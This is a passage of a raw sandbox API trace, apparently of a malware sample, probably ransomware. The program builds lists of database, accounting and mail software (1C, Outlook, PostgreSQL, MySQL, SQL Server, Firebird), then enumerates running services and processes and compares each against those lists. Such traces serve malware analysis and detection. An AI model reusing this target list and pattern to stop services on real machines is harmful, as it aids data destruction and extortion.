(Heap=0x4a0000, Flags=0x0, Ptr=0x4d9368, Size=0x100) returned 0x4d9368 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4d4d30 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4d9470 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4d4d48 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9470, Size=0x8) returned 0x4d9470 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4d9480 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9470, Size=0x10) returned 0x4d94a0 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4d94b8 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b45f0 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d94a0, Size=0x20) returned 0x4d94d8 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c) returned 0x4b4618 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x16) returned 0x4d9500 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1a) returned 0x4b4640 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4d4d60 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x4d9470 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x40) returned 0x4d9520 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9470, Size=0x8) returned 0x4d9470 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x3c) returned 0x4d9568 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9470, Size=0x10) returned 0x4d94a0 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4d95b0 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x18) returned 0x4d95d0 [0260.437] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d94a0, Size=0x20) returned 0x4d95f0 [0260.437] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x24) returned 0x4d9618 [0260.437] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0260.437] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9260 | out: hHeap=0x4a0000) returned 1 [0260.437] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0260.437] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9368 | out: hHeap=0x4a0000) returned 1 [0260.438] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4d9b70 [0260.696] EnumServicesStatusExW (in: hSCManager=0x4d9b70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 0 [0260.723] GetLastError () returned 0xea [0260.723] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9a8) returned 0x4dd450 [0260.723] EnumServicesStatusExW (in: hSCManager=0x4d9b70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4dd450, cbBufSize=0x9a8, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4dd450, pcbBytesNeeded=0x18fd8c, lpServicesReturned=0x18fda4, lpResumeHandle=0x0) returned 1 [0260.727] CloseServiceHandle (hSCObject=0x4d9b70) returned 1 [0260.955] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0260.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0260.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0260.955] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0260.955] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0260.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0260.955] lstrlenW (lpString="AudioSrv") returned 8 [0260.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0260.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0260.955] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0260.955] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0260.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0260.956] lstrlenW (lpString="CscService") returned 10 [0260.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0260.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0260.956] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0260.956] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0260.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0260.956] lstrlenW (lpString="DcomLaunch") returned 10 [0260.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0260.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0260.956] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0260.956] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0260.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0260.956] lstrlenW (lpString="Dhcp") returned 4 [0260.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0260.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0260.956] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0260.956] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0260.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0260.956] lstrlenW (lpString="Dnscache") returned 8 [0260.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0260.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0260.956] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0260.956] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0260.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0260.956] lstrlenW (lpString="eventlog") returned 8 [0260.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0260.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0260.956] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0260.956] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0260.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0260.956] lstrlenW (lpString="EventSystem") returned 11 [0260.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0260.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0260.956] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0260.956] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0260.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0260.956] lstrlenW (lpString="gpsvc") returned 5 [0260.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0260.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0260.957] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0260.957] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0260.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0260.957] lstrlenW (lpString="lmhosts") returned 7 [0260.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0260.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0260.957] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0260.957] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0260.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0260.957] lstrlenW (lpString="MMCSS") returned 5 [0260.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0260.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0260.957] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0260.957] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0260.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0260.957] lstrlenW (lpString="nsi") returned 3 [0260.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0260.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0260.957] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0260.957] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0260.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0260.957] lstrlenW (lpString="PlugPlay") returned 8 [0260.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0260.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0260.957] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0260.957] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0260.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0260.957] lstrlenW (lpString="Power") returned 5 [0260.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0260.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0260.957] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0260.957] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0260.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0260.957] lstrlenW (lpString="ProfSvc") returned 7 [0260.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0260.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0260.957] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0260.957] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0260.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0260.958] lstrlenW (lpString="RpcEptMapper") returned 12 [0260.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0260.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0260.958] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0260.958] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0260.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0260.958] lstrlenW (lpString="RpcSs") returned 5 [0260.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0260.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0260.958] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0260.958] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0260.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0260.958] lstrlenW (lpString="SamSs") returned 5 [0260.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0260.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0260.958] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0260.958] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0260.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0260.958] lstrlenW (lpString="Schedule") returned 8 [0260.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0260.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0260.958] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0260.958] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0260.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0260.958] lstrlenW (lpString="SENS") returned 4 [0260.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0260.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0260.958] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0260.958] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0260.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0260.958] lstrlenW (lpString="ShellHWDetection") returned 16 [0260.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0260.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0260.958] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0260.958] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0260.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0260.958] lstrlenW (lpString="Spooler") returned 7 [0260.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0260.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0260.958] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0260.959] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0260.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0260.959] lstrlenW (lpString="Themes") returned 6 [0260.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0260.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0260.959] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0260.959] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0260.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0260.959] lstrlenW (lpString="UxSms") returned 5 [0260.959] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0260.959] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0260.959] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0260.959] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0260.959] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0260.959] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd450 | out: hHeap=0x4a0000) returned 1 [0260.959] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0260.961] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.962] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.962] lstrlenW (lpString="System") returned 6 [0260.962] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0260.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0260.962] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0260.962] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0260.962] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0260.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0260.962] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0260.962] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.962] lstrlenW (lpString="smss.exe") returned 8 [0260.962] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0260.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0260.963] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0260.963] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0260.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0260.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0260.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0260.963] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.963] lstrlenW (lpString="csrss.exe") returned 9 [0260.963] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0260.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0260.963] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0260.963] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0260.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0260.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0260.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0260.963] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.963] lstrlenW (lpString="wininit.exe") returned 11 [0260.963] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0260.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0260.963] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0260.964] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0260.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0260.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0260.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0260.964] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.964] lstrlenW (lpString="csrss.exe") returned 9 [0260.964] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0260.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0260.964] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0260.964] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0260.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0260.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0260.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0260.964] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.964] lstrlenW (lpString="winlogon.exe") returned 12 [0260.964] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0260.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0260.964] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0260.964] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0260.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0260.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0260.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0260.965] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.965] lstrlenW (lpString="services.exe") returned 12 [0260.965] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0260.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0260.965] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0260.965] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0260.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0260.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0260.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0260.965] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.965] lstrlenW (lpString="lsass.exe") returned 9 [0260.965] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0260.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0260.966] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0260.966] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0260.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0260.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0260.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0260.966] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0260.966] lstrlenW (lpString="lsm.exe") returned 7 [0260.966] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0260.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0260.966] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0260.966] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0260.966] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0260.966] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0260.966] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0260.966] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.966] lstrlenW (lpString="svchost.exe") returned 11 [0260.966] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.966] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.966] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.966] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.967] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.967] lstrlenW (lpString="svchost.exe") returned 11 [0260.967] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.967] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.967] lstrlenW (lpString="svchost.exe") returned 11 [0260.967] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.967] lstrcmpiW 